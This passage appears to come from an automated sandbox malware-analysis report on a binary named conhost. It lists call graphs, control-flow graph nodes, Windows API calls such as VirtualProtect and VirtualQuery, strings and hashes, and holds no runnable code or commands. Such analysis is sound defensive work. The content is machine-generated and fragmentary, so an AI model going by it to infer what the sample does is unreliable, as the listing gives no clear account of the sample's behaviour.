1400015c6 2822->2823 2824 140001394 2 API calls 2823->2824 2825 1400015d5 2824->2825 2826 140001394 2 API calls 2825->2826 2827 1400015e4 2826->2827 2828 140001394 2 API calls 2827->2828 2829 1400015f3 2828->2829 2829->2239

                                                                  Callgraph

                                                                  • Executed
                                                                  • Not Executed
                                                                  • Opacity -> Relevance
                                                                  • Disassembly available
                                                                  callgraph 0 Function_00000001400056E1 1 Function_0000000140001AE4 31 Function_0000000140001D40 1->31 72 Function_0000000140001BA0 1->72 2 Function_00000001400014E5 69 Function_0000000140001394 2->69 3 Function_00000001400010F0 4 Function_00000001400030F1 5 Function_00000001400014F4 5->69 6 Function_0000000140001800 63 Function_0000000140002290 6->63 7 Function_0000000140002500 8 Function_0000000140005800 9 Function_0000000140002F00 53 Function_0000000140001370 9->53 10 Function_0000000140001E00 11 Function_0000000140001000 11->10 38 Function_0000000140001750 11->38 77 Function_0000000140001FB0 11->77 86 Function_0000000140001FC0 11->86 12 Function_0000000140005601 13 Function_0000000140001503 13->69 14 Function_0000000140001404 14->69 15 Function_0000000140002104 16 Function_0000000140005810 16->8 17 Function_0000000140001E10 18 Function_0000000140003110 19 Function_0000000140001512 19->69 20 Function_0000000140002420 21 Function_0000000140002320 22 Function_0000000140001521 22->69 23 Function_0000000140005621 24 Function_0000000140005721 25 Function_0000000140001422 25->69 26 Function_0000000140001530 26->69 27 Function_0000000140003130 28 Function_0000000140001431 28->69 29 Function_000000014000153F 29->69 30 Function_0000000140001440 30->69 31->63 32 Function_0000000140001140 45 Function_0000000140001160 32->45 33 Function_0000000140005541 34 Function_0000000140005641 35 Function_0000000140005741 36 Function_0000000140001F47 54 Function_0000000140001870 36->54 37 Function_0000000140001650 39 Function_0000000140003150 39->8 39->9 39->13 39->22 39->25 39->26 39->28 39->29 39->30 43 Function_000000014000145E 39->43 44 Function_0000000140002660 39->44 50 Function_000000014000156C 39->50 51 Function_000000014000146D 39->51 39->53 58 Function_000000014000157B 39->58 74 Function_00000001400015A8 39->74 75 Function_00000001400014A9 39->75 84 Function_00000001400016C0 39->84 95 Function_00000001400014D6 39->95 97 Function_00000001400026E0 39->97 40 Function_0000000140002050 41 Function_0000000140003051 42 Function_000000014000155D 42->69 43->69 45->39 45->45 45->54 59 Function_0000000140001880 45->59 62 Function_0000000140001F90 45->62 45->84 46 Function_0000000140001760 98 Function_00000001400020E0 46->98 47 Function_0000000140002460 48 Function_0000000140005661 49 Function_0000000140001E65 49->54 50->69 51->69 52 Function_000000014000216F 55 Function_0000000140001A70 55->31 55->72 56 Function_0000000140003070 57 Function_0000000140005571 58->69 59->20 59->31 59->44 59->72 60 Function_0000000140005681 61 Function_0000000140005781 64 Function_0000000140002590 65 Function_0000000140003090 66 Function_0000000140005690 67 Function_0000000140002691 68 Function_0000000140005591 69->16 85 Function_0000000140005AC0 69->85 70 Function_0000000140002194 70->54 71 Function_000000014000219E 72->31 76 Function_00000001400023B0 72->76 89 Function_00000001400024D0 72->89 73 Function_0000000140001FA0 74->69 75->69 78 Function_00000001400022B0 79 Function_00000001400026B0 80 Function_00000001400030B1 81 Function_00000001400055B1 82 Function_00000001400056B1 83 Function_0000000140001AB3 83->31 83->72 85->8 87 Function_0000000140001AC3 87->31 87->72 88 Function_00000001400014C7 88->69 90 Function_00000001400017D0 91 Function_0000000140001FD0 92 Function_00000001400026D0 93 Function_00000001400055D1 94 Function_0000000140001AD4 94->31 94->72 95->69 96 Function_00000001400022E0 97->2 97->5 97->8 97->13 97->19 97->42 97->43 97->44 97->53 97->75 97->88 99 Function_00000001400017E0 99->98 100 Function_00000001400057E0

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • NtApphelpCacheControl.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001156), ref: 00000001400013F7
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.4486033240.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 0000000B.00000002.4486004156.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000B.00000002.4486058656.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000B.00000002.4486084822.0000000140008000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000B.00000002.4486108401.0000000140009000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_140000000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: ApphelpCacheControl
                                                                  • String ID:
                                                                  • API String ID: 3871645765-0
                                                                  • Opcode ID: ec9a092489e5af3e4fa2fdc8bbbcd821a4cad9fc74f03f2b94582c83f0695141
                                                                  • Instruction ID: e197de5498146d0b926ee23ee756be57bf4454c479619e39ddad1fc15c59c4ee
                                                                  • Opcode Fuzzy Hash: ec9a092489e5af3e4fa2fdc8bbbcd821a4cad9fc74f03f2b94582c83f0695141
                                                                  • Instruction Fuzzy Hash: 47F09DB2608B40C6EAA2DB52F89579A77A4F38D7C4F009919BFC843735DB38C1948F44

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 293 1400026e0-14000273b call 140002660 memset 296 140002741-14000274b 293->296 297 14000280e-14000285e call 14000155d 293->297 299 140002774-14000277a 296->299 302 140002953-14000297b call 1400014c7 297->302 303 140002864-140002873 297->303 299->297 301 140002780-140002787 299->301 304 140002789-140002792 301->304 305 140002750-140002752 301->305 320 140002986-1400029c8 call 140001503 call 140005800 memset 302->320 321 14000297d 302->321 306 140002eb7-140002ef4 call 140001370 303->306 307 140002879-140002888 303->307 310 140002794-1400027ab 304->310 311 1400027f8-1400027fb 304->311 308 14000275a-14000276e 305->308 312 1400028e4-14000294e wcsncmp call 1400014e5 307->312 313 14000288a-1400028dd 307->313 308->297 308->299 316 1400027f5 310->316 317 1400027ad-1400027c2 310->317 311->308 312->302 313->312 316->311 322 1400027d0-1400027d7 317->322 329 140002e49-140002e84 call 140001370 320->329 330 1400029ce-1400029d5 320->330 321->320 323 1400027d9-1400027f3 322->323 324 140002800-140002809 322->324 323->316 323->322 324->308 333 1400029d7-140002a0c 329->333 337 140002e8a 329->337 332 140002a13-140002a43 wcscpy wcscat wcslen 330->332 330->333 335 140002a45-140002a76 wcslen 332->335 336 140002a78-140002aa5 332->336 333->332 338 140002aa8-140002abf wcslen 335->338 336->338 337->332 339 140002ac5-140002ad8 338->339 340 140002e8f-140002eab call 140001370 338->340 342 140002af5-140002dfb wcslen call 1400014a9 * 2 call 1400014f4 call 1400014c7 * 2 call 14000145e * 3 339->342 343 140002ada-140002aee 339->343 340->306 361 140002dfd-140002e1b call 140001512 342->361 362 140002e20-140002e48 call 14000145e 342->362 343->342 361->362
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.4486033240.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 0000000B.00000002.4486004156.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000B.00000002.4486058656.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000B.00000002.4486084822.0000000140008000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000B.00000002.4486108401.0000000140009000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_140000000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: wcslen$memset$wcscatwcscpywcsncmp
                                                                  • String ID: 0$X$`
                                                                  • API String ID: 780471329-2527496196
                                                                  • Opcode ID: 8a8d5d6375714077ba8ded8dc44350f0e0889e319027c8e0974b10fb53a6a3b9
                                                                  • Instruction ID: 38bdbc93d83a365de9f41c25a29d06bffb51846884160dca96ebd204792c2ef8
                                                                  • Opcode Fuzzy Hash: 8a8d5d6375714077ba8ded8dc44350f0e0889e319027c8e0974b10fb53a6a3b9
                                                                  • Instruction Fuzzy Hash: A31237B2618BC086E762CB16F8443EA77A4F789794F404215EBA957BF5EF78C189C700

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.4486033240.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 0000000B.00000002.4486004156.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000B.00000002.4486058656.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000B.00000002.4486084822.0000000140008000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000B.00000002.4486108401.0000000140009000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_140000000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                                  • String ID:
                                                                  • API String ID: 2643109117-0
                                                                  • Opcode ID: fa08311d13287933522aa3b3acb558fe216e304684c83b91bee948eec2286b12
                                                                  • Instruction ID: ebd3d17da5faede283770bb78fa2404d61df290fa4322c1b470fb34d0ad76b6f
                                                                  • Opcode Fuzzy Hash: fa08311d13287933522aa3b3acb558fe216e304684c83b91bee948eec2286b12
                                                                  • Instruction Fuzzy Hash: 135107B5611A4485FA66EF27F9543EA27A1B78D7C0F449025FF4E973B2DE38C4958300

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 407 140001ba0-140001bc0 408 140001bc2-140001bd7 407->408 409 140001c09 407->409 410 140001be9-140001bf1 408->410 411 140001c0c-140001c17 call 1400023b0 409->411 412 140001bf3-140001c02 410->412 413 140001be0-140001be7 410->413 418 140001cf4-140001cfe call 140001d40 411->418 419 140001c1d-140001c6c call 1400024d0 VirtualQuery 411->419 412->413 415 140001c04 412->415 413->410 413->411 417 140001cd7-140001cf3 memcpy 415->417 422 140001d03-140001d1e call 140001d40 418->422 419->422 425 140001c72-140001c79 419->425 426 140001d23-140001d38 GetLastError call 140001d40 422->426 427 140001c7b-140001c7e 425->427 428 140001c8e-140001c97 425->428 432 140001cd1 427->432 433 140001c80-140001c83 427->433 429 140001ca4-140001ccf VirtualProtect 428->429 430 140001c99-140001c9c 428->430 429->426 429->432 430->432 435 140001c9e 430->435 432->417 433->432 434 140001c85-140001c8a 433->434 434->432 437 140001c8c 434->437 435->429 437->435
                                                                  APIs
                                                                  • VirtualQuery.KERNEL32(?,?,?,?,0000000140006B30,0000000140006B30,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001C63
                                                                  • VirtualProtect.KERNEL32(?,?,?,?,0000000140006B30,0000000140006B30,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001CC7
                                                                  • memcpy.MSVCRT ref: 0000000140001CE0
                                                                  • GetLastError.KERNEL32(?,?,?,?,0000000140006B30,0000000140006B30,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001D23
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.4486033240.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 0000000B.00000002.4486004156.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000B.00000002.4486058656.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000B.00000002.4486084822.0000000140008000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000B.00000002.4486108401.0000000140009000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_140000000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                                  • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                                  • API String ID: 2595394609-2123141913
                                                                  • Opcode ID: bb436228cfd4f1ccd7155e40a7c38cfe919325a164204cb4bf39bfc481459dd7
                                                                  • Instruction ID: 6dde0a6cb0c710e6ba83898a0455ef224223442d8ea2fa93eb05d8d59e0ac844
                                                                  • Opcode Fuzzy Hash: bb436228cfd4f1ccd7155e40a7c38cfe919325a164204cb4bf39bfc481459dd7
                                                                  • Instruction Fuzzy Hash: BF4125B1200A4482FA66DF57F884BE927A1F79DBC4F554126EF0E877B1DA38C58AC700

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 438 140002104-14000210b 439 140002111-140002128 EnterCriticalSection 438->439 440 140002218-140002221 438->440 441 14000220b-140002212 LeaveCriticalSection 439->441 442 14000212e-14000213c 439->442 443 140002272-140002280 440->443 444 140002223-14000222d 440->444 441->440 445 14000214d-140002159 TlsGetValue GetLastError 442->445 446 140002241-140002263 DeleteCriticalSection 444->446 447 14000222f 444->447 448 14000215b-14000215e 445->448 449 140002140-140002147 445->449 446->443 450 140002230-14000223f free 447->450 448->449 451 140002160-14000216d 448->451 449->441 449->445 450->446 450->450 451->449
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.4486033240.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 0000000B.00000002.4486004156.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000B.00000002.4486058656.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000B.00000002.4486084822.0000000140008000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000B.00000002.4486108401.0000000140009000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_140000000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
                                                                  • String ID:
                                                                  • API String ID: 3326252324-0
                                                                  • Opcode ID: b6daad202331d3377a7ea66a46ddf4e15fa82aecf61de4f4e6af2334f27ab8f3
                                                                  • Instruction ID: 85b1e329e0b1a08572ebc2c1fec366adfc50b0fd90975013ac30613e2b5d1ab5
                                                                  • Opcode Fuzzy Hash: b6daad202331d3377a7ea66a46ddf4e15fa82aecf61de4f4e6af2334f27ab8f3
                                                                  • Instruction Fuzzy Hash: E321F8B5205A5092FA2BDB63FD443E92365BB2DBD0F444121FF4A576B4DB78C9878700

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 453 140001e10-140001e2d 454 140001e3e-140001e48 453->454 455 140001e2f-140001e38 453->455 457 140001ea3-140001ea8 454->457 458 140001e4a-140001e53 454->458 455->454 456 140001f60-140001f69 455->456 457->456 461 140001eae-140001eb3 457->461 459 140001e55-140001e60 458->459 460 140001ecc-140001ed1 458->460 459->457 464 140001f23-140001f2d 460->464 465 140001ed3-140001ee2 signal 460->465 462 140001eb5-140001eba 461->462 463 140001efb-140001f0a call 140005db0 461->463 462->456 468 140001ec0 462->468 463->464 475 140001f0c-140001f10 463->475 466 140001f43-140001f45 464->466 467 140001f2f-140001f3f 464->467 465->464 469 140001ee4-140001ee8 465->469 466->456 467->466 468->464 471 140001eea-140001ef9 signal 469->471 472 140001f4e-140001f53 469->472 471->456 474 140001f5a 472->474 474->456 476 140001f12-140001f21 signal 475->476 477 140001f55 475->477 476->456 477->474
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.4486033240.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 0000000B.00000002.4486004156.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000B.00000002.4486058656.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000B.00000002.4486084822.0000000140008000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000B.00000002.4486108401.0000000140009000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_140000000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: CCG
                                                                  • API String ID: 0-1584390748
                                                                  • Opcode ID: c28b12554d4a6c79ce808bd36c9e9ce77f260d0515e985456a5ccaa914272c8d
                                                                  • Instruction ID: 353b68a7c186469ba3dfaeb6628a2aef359421979753f414f4a078a371686747
                                                                  • Opcode Fuzzy Hash: c28b12554d4a6c79ce808bd36c9e9ce77f260d0515e985456a5ccaa914272c8d
                                                                  • Instruction Fuzzy Hash: CF2159B1A0150582FA7BDA2BB5943FA1192ABCD7E4F258536BF19473F5DF3C88828241

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 478 140001880-14000189c 479 1400018a2-1400018f9 call 140002420 call 140002660 478->479 480 140001a0f-140001a1f 478->480 479->480 485 1400018ff-140001910 479->485 486 140001912-14000191c 485->486 487 14000193e-140001941 485->487 488 14000194d-140001954 486->488 489 14000191e-140001929 486->489 487->488 490 140001943-140001947 487->490 493 140001956-140001961 488->493 494 14000199e-1400019a6 488->494 489->488 491 14000192b-14000193a 489->491 490->488 492 140001a20-140001a26 490->492 491->487 496 140001b87-140001b98 call 140001d40 492->496 497 140001a2c-140001a37 492->497 498 140001970-14000199c call 140001ba0 493->498 494->480 495 1400019a8-1400019c1 494->495 501 1400019df-1400019e7 495->501 497->494 502 140001a3d-140001a5f 497->502 498->494 505 1400019e9-140001a0d VirtualProtect 501->505 506 1400019d0-1400019dd 501->506 507 140001a7d-140001a97 502->507 505->506 506->480 506->501 508 140001b74-140001b82 call 140001d40 507->508 509 140001a9d-140001afa 507->509 508->496 515 140001b22-140001b26 509->515 516 140001afc-140001b0e 509->516 519 140001b2c-140001b30 515->519 520 140001a70-140001a77 515->520 517 140001b5c-140001b6c 516->517 518 140001b10-140001b20 516->518 517->508 521 140001b6f call 140001d40 517->521 518->515 518->517 519->520 522 140001b36-140001b57 call 140001ba0 519->522 520->494 520->507 521->508 522->517
                                                                  APIs
                                                                  • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001247), ref: 00000001400019F9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.4486033240.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 0000000B.00000002.4486004156.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000B.00000002.4486058656.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000B.00000002.4486084822.0000000140008000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000B.00000002.4486108401.0000000140009000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_140000000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                                  • API String ID: 544645111-395989641
                                                                  • Opcode ID: e5d8ebd5758d5a4f54604a55e7de3be1c490fe11f4c8c19130e77cbf6da935bf
                                                                  • Instruction ID: d270e2f65666933e3b4117e97bcef0dbb4466358d2d0273278561e51e7a907b3
                                                                  • Opcode Fuzzy Hash: e5d8ebd5758d5a4f54604a55e7de3be1c490fe11f4c8c19130e77cbf6da935bf
                                                                  • Instruction Fuzzy Hash: EB5136B6710A44D6EB22CF67F8407E92762B75DBE8F448221EB19177B4CB38C586C700

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 526 140001800-140001810 527 140001812-140001822 526->527 528 140001824 526->528 529 14000182b-140001867 call 140002290 fprintf 527->529 528->529
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.4486033240.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 0000000B.00000002.4486004156.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000B.00000002.4486058656.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000B.00000002.4486084822.0000000140008000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000B.00000002.4486108401.0000000140009000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_140000000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: fprintf
                                                                  • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                  • API String ID: 383729395-3474627141
                                                                  • Opcode ID: af99127221d82ef0d8b822e140b018ded53f7d87d333435570a5b2e6f4756778
                                                                  • Instruction ID: cf1f24ffb5d2eae8d7145fab7a52e0f441b8d9a433b02ec8b20804439284df64
                                                                  • Opcode Fuzzy Hash: af99127221d82ef0d8b822e140b018ded53f7d87d333435570a5b2e6f4756778
                                                                  • Instruction Fuzzy Hash: 33F09671614A4482E622EB76F9413ED6361E75D7C1F54D211FF4D67662DF38D182C300

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 532 14000219e-1400021a5 533 140002272-140002280 532->533 534 1400021ab-1400021c2 EnterCriticalSection 532->534 535 140002265-14000226c LeaveCriticalSection 534->535 536 1400021c8-1400021d6 534->536 535->533 537 1400021e9-1400021f5 TlsGetValue GetLastError 536->537 538 1400021f7-1400021fa 537->538 539 1400021e0-1400021e7 537->539 538->539 540 1400021fc-140002209 538->540 539->535 539->537 540->539
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.4486033240.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 0000000B.00000002.4486004156.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000B.00000002.4486058656.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000B.00000002.4486084822.0000000140008000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000B.00000002.4486108401.0000000140009000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_140000000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                                  • String ID:
                                                                  • API String ID: 682475483-0
                                                                  • Opcode ID: 6fc405c86b9af7343f2bb51cef9e0bf49d7843e5d2997486b9003ac8a2fbe4b0
                                                                  • Instruction ID: 7d6343a71f304d913a925ede37f5c584d17af65e56df17c893f5aececf125f77
                                                                  • Opcode Fuzzy Hash: 6fc405c86b9af7343f2bb51cef9e0bf49d7843e5d2997486b9003ac8a2fbe4b0
                                                                  • Instruction Fuzzy Hash: BB01B6B6305A4092FA1BDB63FD043D86365BB2CBD1F494021EF0953AB4DFB9C9968300